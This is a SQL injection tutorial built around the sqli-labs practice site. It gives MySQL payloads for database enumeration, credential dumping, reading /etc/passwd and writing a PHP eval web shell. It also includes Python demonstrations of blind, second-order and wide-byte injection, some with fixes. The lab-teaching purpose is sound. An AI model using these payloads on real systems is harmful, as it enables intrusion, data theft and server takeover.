0x01 Differences between MySQL below 5.0 and MySQL 5.0 and above
MySQL 5.0 and later ship a database named information_schema. It stores metadata about every other database maintained by the MySQL server: database names, tables, columns and their data types, and access privileges. Versions below 5.0 have no such database, so table and column names have to be guessed there.
information_schema
System database recording the current databases, tables, columns and user privilege information.
SCHEMATA
Stores the basic information of every database on the MySQL server: database name, SQL path, default character set, and so on.
Query the database names:
http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata %23
The comment character is URL-encoded as %23: a literal # in a URL is a fragment marker that the browser never sends to the server, so the payload would arrive truncated. --+ (which decodes to "-- ") works as well.
TABLES
Stores information about tables: whether a table is a base table or a system view, its storage engine, number of rows, creation time and last update time.
List the tables of the security database:
http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' %23
COLUMNS
Stores column information: every column of every table, its ordinal position within the table, data type, character set, privileges, comment, and so on.
List the columns of the users table:
http://localhost/sqli-labs/Less-2/index.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' %23
Filtering on table_name alone merges the columns of every table called users in any database, so keep the table_schema condition when the result looks mixed.
0x02 Commonly used information functions
Current user: user()
Database version: version()
Current database name: database()
Operating system: @@version_compile_os
0x03 Basic flow of manual injection
3.1 Find the number of columns
order by n
Increase n until the query errors; the last n that works is the column count the union select must match.
3.2 Get the database names
select 1,2,schema_name from information_schema.schemata
3.3 Get the current database name
select 1,2,3,database()
3.4 Get the tables of the current database
select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
or, one table at a time:
select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
3.5 Get the columns of a table
select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
3.6 Get the values of the columns
select 1,group_concat(username,0x3a,password) from users
(0x3a is a ':' separator; without it each username runs straight into its password.)
3.7 Read files
select load_file('/etc/passwd')
Prerequisites:
- The file is readable by the operating-system user the MySQL server runs as
- The file exists on the database server (not the web server, if the two differ)
- The path is absolute
- The file is smaller than max_allowed_packet
- The current database user has the FILE privilege
- secure_file_priv is empty; if it is set to a directory, only files under that directory can be read, and if it is NULL, load_file and into outfile are disabled entirely (check with select @@secure_file_priv)
3.8 Write files
select '<?php @eval($_POST["c"]); ?>' into outfile '/var/www/html/shell.php'
Prerequisites:
- The target directory is writable by the MySQL operating-system user
- The current database user has the FILE privilege
- The destination file does not already exist (into outfile never overwrites)
- secure_file_priv is empty
- The path is absolute, and the web root must be known for the written shell to be reachable
When quotes are filtered, the PHP payload can be supplied as a hex literal (0x3c3f70687020... for "<?php ") instead of a quoted string.
0x04 Common injection techniques
4.1 Union injection
UNION combines the result sets of two SELECT statements. When the injected parameter matches no row (id=-1), the first SELECT returns nothing and the page displays the columns of the second SELECT instead. Both SELECTs must return the same number of columns (found with order by above).
Example:
id=-1' union select 1,2,3--+
4.2 Boolean-based injection
Inject a condition and tell true from false by whether the page changes:
- left(database(),1)>'s'
- ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+
- ascii(substr((select database()),1,1))=98
- ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))>98%23
Explanation: mid(a,b,c) returns c characters of string a starting at position b; ord() behaves like ascii() here and returns the character's code, so the value is recovered by comparison one character at a time.
- regexp injection
select user() regexp '^[a-z]'
- like injection
select user() like 'ro%'
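The comparisons above are normally run by a script rather than by hand. The following Python is an added example, not code from the original notes or from sqli-labs: it emulates a page that splices id into its query, asks the "is the character code greater than N" question from the payloads above, and binary-searches each character so that seven requests recover one byte instead of up to 128. The users table is constructed sample data, SQLite in memory stands in for MySQL, and SQLite's unicode() plays the role of MySQL's ascii(); those are the assumptions.

```python
import sqlite3


def build_db():
    """Constructed stand-in for sqli-labs' security.users (sample rows, not the lab's data)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer primary key, username text, password text)")
    con.executemany("insert into users values(?,?,?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")])
    return con


def vulnerable_page(con, id_param):
    """Emulates index.php?id=...: the parameter is spliced into the query unquoted.
    Returns True when a row comes back (the page shows the user), False otherwise."""
    sql = "select username from users where id=" + id_param + " limit 0,1"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


class Oracle:
    """One Boolean question per request: is ascii(substr((expr),pos,1)) > value ?
    MySQL spells the function ascii(); SQLite's equivalent is unicode()."""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def ask(self, expr, pos, value):
        self.requests += 1
        payload = f"1 and unicode(substr(({expr}),{pos},1))>{value}"
        return vulnerable_page(self.con, payload)


def extract(oracle, expr, max_len=64):
    """Recover the string produced by expr one character at a time, binary-searching
    the ASCII range 0..127 (exactly 7 requests per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(expr, pos, mid):   # true: the code is greater than mid
                lo = mid + 1
            else:                            # false: code <= mid, or past the end
                hi = mid
        if lo == 0:   # substr past the end is '', unicode('') is NULL, so every answer was false
            break
        out += chr(lo)
    return out


def dump_admin_password():
    """Run the whole extraction and report the request count as well."""
    oracle = Oracle(build_db())
    secret = extract(oracle, "select password from users where id=8")
    return secret, oracle.requests


if __name__ == "__main__":
    print(dump_admin_password())   # ('admin', 42): 5 characters plus the terminating probe, 7 requests each
```

The same loop drives time-based injection unchanged: replace the true/false check in vulnerable_page with a response-time threshold and the payload with the if(...,1,sleep(5)) form from section 4.4.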
4.3 Error-based injection
Build the payload so that the data is echoed back inside the error message, using floor(), updatexml(), extractvalue(), name_const(), double-query injection and similar tricks.
- floor
?id=1 union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) as a from information_schema.columns group by a--+
rand(0) is seeded, so floor(rand(0)*2) yields the fixed sequence 0,1,1,0,1,1,...; because rand() is evaluated again when group by inserts into its temporary table, the same key is produced twice and MySQL fails with "Duplicate entry '::<user>::1' for key 'group_key'", leaking the concatenated value. The table being grouped needs at least three rows.
- updatexml (the error message is truncated to 32 characters)
?id=1 and updatexml(1,concat(0x7e,(select @@version),0x7e),1)
- extractvalue (same 32-character limit)
?id=1 and extractvalue(1,concat(0x7e,(select @@version),0x7e))
Longer values are read in slices with substr((select ...),1,32), then substr(...,33,32), and so on.
- name_const (older versions; fails with "Duplicate column name '<version>'")
?id=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
- Error based Double Query Injection
?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1
- exp (MySQL 5.5.5 and above; patched in later releases, so it does not work everywhere)
id=1 and (select exp(~(select * from(select user())x)))
- polygon (older versions)
id=1 and polygon((select * from(select * from(select user())a)b))
4.4 Time-based injection
Delay injection: the condition is judged by the response time instead of the page content.
?id=1 and if(ascii(substr(database(),1,1))>115,1,sleep(5))
4.5 Stacked query injection
Stacked queries differ from union injection: a union can only append another SELECT to the original query, whereas stacked queries, separated by a semicolon, execute arbitrary statements (insert, update, drop, ...). They only work when the application's database API runs several statements in one call (mysqli_multi_query in PHP, for example), and Oracle does not support stacked queries at all.
Example:
id=1';select if(substr(user(),1,1)='r',sleep(3),1)%23
4.6 Second-order injection
How it works: on the first request the data is escaped with addslashes or by get_magic_quotes_gpc before it is inserted, but the escaping only protects that one statement. An input of ' becomes \' after addslashes; the SQL parser consumes the backslash, so the database stores the original '. Later the developer treats whatever is stored in the database as trusted, reads the dirty data back and splices it into a new query without further escaping, and the quote that was harmless on the way in becomes an injection on the way out.
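The classic instance is a password-change form that looks up the current username from the database. The script below is an added example, not from the original notes: registration escapes the input with a re-implementation of PHP's addslashes, the stored row keeps the raw quote, and the later UPDATE trusts that stored name. SQLite in memory stands in for MySQL; because SQLite has no backslash escapes, the registration binds the raw value that MySQL would have stored after parsing \' (that substitution, the admin row and the attacker name are the assumptions).

```python
import sqlite3


def addslashes(s):
    """PHP addslashes(): prefix ' " \\ and NUL with a backslash."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def build_db():
    """Constructed sample data: one real admin account."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(username text, password text)")
    con.execute("insert into users values('admin','S3cret!')")
    return con


def register(con, username, password):
    """Step 1: registration escapes the input, so this INSERT itself is not injectable."""
    sql = (f"insert into users values('{addslashes(username)}',"
           f"'{addslashes(password)}')")
    # MySQL parses \' back into a bare quote, so the row stores the raw username.
    # SQLite has no backslash escapes, so the raw value is bound here to reproduce
    # exactly what MySQL would have stored.
    con.execute("insert into users values(?,?)", (username, password))
    return sql


def change_password(con, session_user, old_pw, new_pw):
    """Step 2: the username comes from the database and is trusted: no escaping."""
    sql = (f"update users set password='{addslashes(new_pw)}' "
           f"where username='{session_user}' and password='{addslashes(old_pw)}'")
    con.execute(sql)
    return sql


def change_password_safe(con, session_user, old_pw, new_pw):
    """Fixed version: a bound parameter stays data no matter where it came from."""
    con.execute("update users set password=? where username=? and password=?",
                (new_pw, session_user, old_pw))


def get_password(con, username):
    row = con.execute("select password from users where username=?", (username,)).fetchone()
    return row[0] if row else None


def attack(fixed=False):
    """Register admin'-- , then change 'own' password while supplying a wrong old password.
    The stored name turns the WHERE clause into  username='admin'-- ' and password='...'
    so the old-password check is commented out and the real admin row is updated."""
    con = build_db()
    attacker = "admin'-- "
    register(con, attacker, "whatever")
    change = change_password_safe if fixed else change_password
    change(con, attacker, "wrong-old-password", "pwned")
    return get_password(con, "admin")


if __name__ == "__main__":
    print(attack())            # pwned   (admin's password replaced, old password never checked)
    print(attack(fixed=True))  # S3cret! (bound parameters: the stored quote is just data)
```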
4.7 Wide-byte injection
Conditions:
- The query parameter is wrapped in single quotes and single quotes in the input are escaped (addslashes or similar)
- The database connection uses the GBK character set
id=-1%df' union select 1,user(),3%23
Under these conditions the single quote is escaped to \' (%5c%27), so the request bytes become %df%5c%27. In GBK, %df%5c is a valid two-byte Chinese character: the lead byte %df swallows the backslash, the quote that follows is no longer escaped, the string is closed and the rest of the payload is parsed as SQL.
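Why the backslash disappears is easiest to see at the byte level. The following Python is an added example, not from the original notes: it applies a byte-wise addslashes to the payload above, builds the query the way the vulnerable page does, and then decodes the resulting bytes as GBK, as a single-byte charset and as UTF-8 to show that only the GBK decode merges %df with the backslash. The query template and the escaping routine are assumptions standing in for the PHP application.

```python
from urllib.parse import unquote_to_bytes

# The payload from the notes, exactly as it travels in the URL.
URL_PARAM = "-1%df' union select 1,user(),3%23"


def addslashes_bytes(data):
    """Byte-level addslashes(): PHP escapes bytes, not characters, so it never notices
    that 0xdf is the first half of a two-byte GBK character."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\0":
            out.append(0x5C)   # backslash
        out.append(b)
    return bytes(out)


def build_query(raw_param):
    """The application: $id = addslashes($_GET['id']); "... where id='$id' limit 0,1"."""
    return b"select * from users where id='" + addslashes_bytes(raw_param) + b"' limit 0,1"


def quote_breaks_out(url_param, charset):
    """Decode the query the way a server using `charset` would and report whether the
    injected quote is still escaped.
    True:  the byte before the quote was absorbed into a multi-byte character, the
           string is closed and the union runs.
    False: the backslash survives and the quote stays inside the string literal.
    None:  the bytes are not valid in that charset, so nothing merges."""
    query = build_query(unquote_to_bytes(url_param))
    try:
        decoded = query.decode(charset)
    except UnicodeDecodeError:
        return None
    i = decoded.index("' union select")
    return decoded[i - 1] != "\\"


def show(charset):
    """The query as the server sees it (undecodable bytes shown as U+FFFD)."""
    return build_query(unquote_to_bytes(URL_PARAM)).decode(charset, errors="replace")


if __name__ == "__main__":
    print(show("gbk"))        # ... where id='-1<one CJK character>' union select 1,user(),3#' limit 0,1
    for cs in ("gbk", "latin-1", "utf-8"):
        print(cs, quote_breaks_out(URL_PARAM, cs))   # gbk True, latin-1 False, utf-8 None
```

The fix is not a better blacklist: set the connection character set through the client library (mysqli_set_charset in PHP) so that mysql_real_escape_string knows it is escaping GBK, or use prepared statements. Issuing SET NAMES gbk alone changes the server side only and leaves the escaping routine unaware of the multi-byte encoding.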
4.8 Cookie injection
The parameter is read from the cookie instead of the query string:
Cookie: id=1 and 1=1
4.9 Base64 injection
The application base64-decodes the parameter before using it, so the payload is base64-encoded before it is sent.
4.10 XFF injection
The X-Forwarded-For header (XFF) carries the client's real IP address when the request passes through a proxy; applications that log or store this value in the database without validating it can be injected through the header:
X-Forwarded-For: 127.0.0.1' union select 1,2,user()#